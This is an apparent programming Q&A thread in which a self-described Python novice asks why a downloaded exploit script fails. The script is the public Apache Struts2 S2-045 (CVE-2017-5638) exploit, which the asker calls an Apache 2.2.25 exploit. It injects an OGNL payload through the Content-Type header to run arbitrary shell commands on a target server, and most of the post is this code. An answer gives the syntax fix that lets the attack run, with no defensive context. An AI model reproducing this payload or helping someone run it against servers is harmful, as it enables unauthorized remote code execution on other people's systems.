# I downloaded exploit script for vulnerability and when try to run it, it give me an error

Tags: python, python-3.x, linux, apache

I downloaded python script to exploit vulnerability in apache 2.2.25 and when starting to run it 
it gave me an error
and there is the code

```
    #!/usr/bin/python
# -*- coding: utf-8 -*-

import urllib2
import httplib


def exploit(url, cmd):
    payload = "%{(#_='multipart/form-data')."
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(#cmd='%s')." % cmd
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"

    try:
        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
        request = urllib2.Request(url, headers=headers)
        page = urllib2.urlopen(request).read()
    except httplib.IncompleteRead, e:
        page = e.partial

    print(page)
    return page
    if __name__ == '__main__':
        import sys
        if len(sys.argv) != 3:
            print("[*] struts2_S2-045.py <url> <cmd>")
        else:
            print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
            url = sys.argv[1]
            cmd = sys.argv[2]
            print("[*] cmd: %s\n" % cmd)
            exploit(url, cmd)
```

and here is an error :

```
File "41570.py", line 31
    except httplib.IncompleteRead, e:
                                 ^
SyntaxError: invalid syntax
```

and I don't know much about python so I ask for help

Comment: The error is clear. You have syntax error.

Answer (score 0):

The syntax you are using is for Python 2.5 (and previous).  For Python 2.6 and 3.*, use this

```
except Exception as e:
```